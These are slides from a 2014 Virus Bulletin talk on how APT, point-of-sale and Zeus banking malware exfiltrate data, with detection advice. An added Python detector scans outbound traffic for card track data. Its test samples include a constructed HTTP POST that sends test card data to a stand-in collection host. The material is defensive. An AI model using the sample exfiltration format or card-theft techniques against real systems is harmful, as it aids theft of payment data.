Exfiltration slides-v1-release
Eric Koeppen
Exfiltration slides from Virus Bulletin 2014.
1.
HOW THEY’RE GETTING THE DATA OUT OF YOUR NETWORK
Eric Koeppen, IBM X-Force Advanced Research
erkoeppe[at]us[dot]ibm[dot]com, @PorkChop (v1)
IBM Security Systems | © 2014 IBM Corporation
2.
AGENDA
Introduction
Exfiltration Scenarios
– Advanced Persistent Threat (APT)
– Point of Sale (POS) Malware
– Financial Malware
Conclusion
3.
HOW THEY’RE GETTING THE DATA OUT OF YOUR NETWORK: A SURVEY OF METHODS USED FOR EXFILTRATION OF SENSITIVE DATA, RECOMMENDATIONS FOR DETECTION AND PROTECTION
INTRODUCTION
4.
INTRODUCTION
The initial malware infection is often just the first step: the data is then sent to external servers. This can have disastrous effects:
– Initial loss of revenue
– Company brand image
– Customer loyalty
– Competitive advantage (trade secrets)
– Subsequent lawsuits
5.
EXFILTRATION SCENARIOS
6.
ADVANCED PERSISTENT THREAT
Operation ShadyRAT
– Began 2006 and ran for 5 years
– Targeted over 70 organizations
– Government organizations & private companies
– Multiple infection mechanisms
– Moves laterally through network
– Novel C2 (often used steganography)
– Petabytes of data
7.
ADVANCED PERSISTENT THREAT
8.
ADVANCED PERSISTENT THREAT
Detection: APT Exfiltration tactics
– Data different for each site
  • Data types different
  • Data formats different
– Various forms of C2
– Initial connection uses predefined handshake
9.
POINT OF SALE MALWARE
BlackPOS – the Target attack
– Customer data compromised
  • 40 million accounts
  • PII data for 70 million
– Initial infection by Trojan
– Periodic memory scraping to collect info
10.
POINT OF SALE MALWARE (SCENARIO 1)
11.
POINT OF SALE MALWARE (SCENARIO 2)
12.
POINT OF SALE MALWARE
Detection: POS Malware Exfiltration
– Leverages different transport protocols/methods
  • HTTP POSTs, HTTP GETs, HTTPS, FTP, SMB/NetBIOS, NFS, etc.
– Data usually in a known format:
  • Track 1 & 2 credit card information
– Various data encoding techniques:
  • Some samples use ASCII or UUencoding
  • Some samples use minor obfuscation
  • Some samples use encryption
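Slide 12's detection point, that POS exfiltration can be caught on the wire by knowing the data format (Track 1 and Track 2) and the encodings in use (plain ASCII, UUencoding), as an added Python example that is not part of the slides: it builds a raw and, where present, a uudecoded view of an outbound payload, matches the Track 1/Track 2 layouts, and keeps only Luhn-valid PANs to cut false positives. The sample payloads, the host collect.example and the path /upload.php are constructed for the example.

```python
import binascii
import re
from typing import Dict, List, Tuple

# Track 2: ';' start sentinel, 13-19 digit PAN, '=' separator, YYMM expiry,
# 3-digit service code, discretionary data, '?' end sentinel.
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})[^?]{0,20}\?")
# Track 1 format B: '%B', PAN, '^' name '^', YYMM, service code, discretionary, '?'.
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})[^?]{0,40}\?")


def luhn_ok(pan: str) -> bool:
    """Luhn mod-10 check; drops digit runs that are not plausible card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def decode_views(payload: bytes) -> List[Tuple[str, str]]:
    """(encoding, text) views: raw bytes, plus a uudecoded view if a 'begin' header is present."""
    views = [("raw", payload.decode("latin-1"))]
    lines = payload.splitlines()
    if lines and lines[0].startswith(b"begin "):
        decoded = b""
        for line in lines[1:]:
            if line.strip() == b"end":
                break
            try:
                decoded += binascii.a2b_uu(line)
            except binascii.Error:
                return views  # malformed uuencode: keep only the raw view
        views.append(("uuencode", decoded.decode("latin-1")))
    return views


def scan_payload(payload: bytes) -> List[Dict[str, object]]:
    """Report Luhn-valid track data found in any decodable view of an outbound payload."""
    findings = []
    for encoding, text in decode_views(payload):
        for m in TRACK2_RE.finditer(text):
            if luhn_ok(m.group(1)):
                findings.append({"track": 2, "encoding": encoding,
                                 "pan_masked": "*" * 12 + m.group(1)[-4:],
                                 "expiry": m.group(2)})
        for m in TRACK1_RE.finditer(text):
            if luhn_ok(m.group(1)):
                findings.append({"track": 1, "encoding": encoding,
                                 "pan_masked": "*" * 12 + m.group(1)[-4:],
                                 "expiry": m.group(3)})
    return findings


# Constructed sample payloads (not from any real capture): 4111111111111111 is the
# well-known Luhn-valid test number; 4111111111111112 fails the Luhn check.
SAMPLE_HTTP_POST = (b"POST /upload.php HTTP/1.1\r\nHost: collect.example\r\n\r\n"
                    b"data=%B4111111111111111^DOE/JOHN^25121011234567890?")
_TRACK2 = b";4111111111111111=25121015432100000?"
SAMPLE_UUENCODED = b"begin 644 dump.txt\n" + binascii.b2a_uu(_TRACK2) + b"`\nend\n"
SAMPLE_DECOY = b";4111111111111112=25121015432100000?"
```

Run over the three samples, scan_payload yields one Track 1 hit from the raw HTTP body, one Track 2 hit from the uudecoded view, and nothing for the Luhn-invalid decoy.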
13.
FINANCIAL MALWARE
Zeus Banking Trojan
– Many variants
– Has been around for years
– Gameover Zeus variant has accounted for over $100 million in theft since 2011
– Various techniques:
  • Mock up web pages for stealing bank info
  • Parsing cookie files for local data-containing files
  • Steal digital certificates, local private keys
  • Stealing FTP client info and mail client settings
  • Parses registry keys for valuable information
14.
FINANCIAL MALWARE (SCENARIO 1)
15.
FINANCIAL MALWARE (SCENARIO 2)
16.
FINANCIAL MALWARE
Detection: Zeus Banking Trojan Exfiltration
– Constantly updating their techniques
– Payload messages hashed, signed, and encrypted with RC4 encryption
– Can detect the presence of a P2P botnet on the network (Gameover P2P variant)
  • Detect P2P keep-alive messages
17.
CONCLUSION
18.
CONCLUSION
– Changing landscape
– Detection based on knowing:
  • Which data is being targeted
  • What are typical formats for that data
  • How that data is being encoded
– When data is encrypted, monitor traffic patterns
– Common practices can go a long way:
  • Monitor logs
  • Keep patches up to date
  • Lock down acceptable communication
  • Educate users
19.
Thank You!
Eric Koeppen, IBM X-Force Advanced Research
erkoeppe[at]us[dot]ibm[dot]com, @PorkChop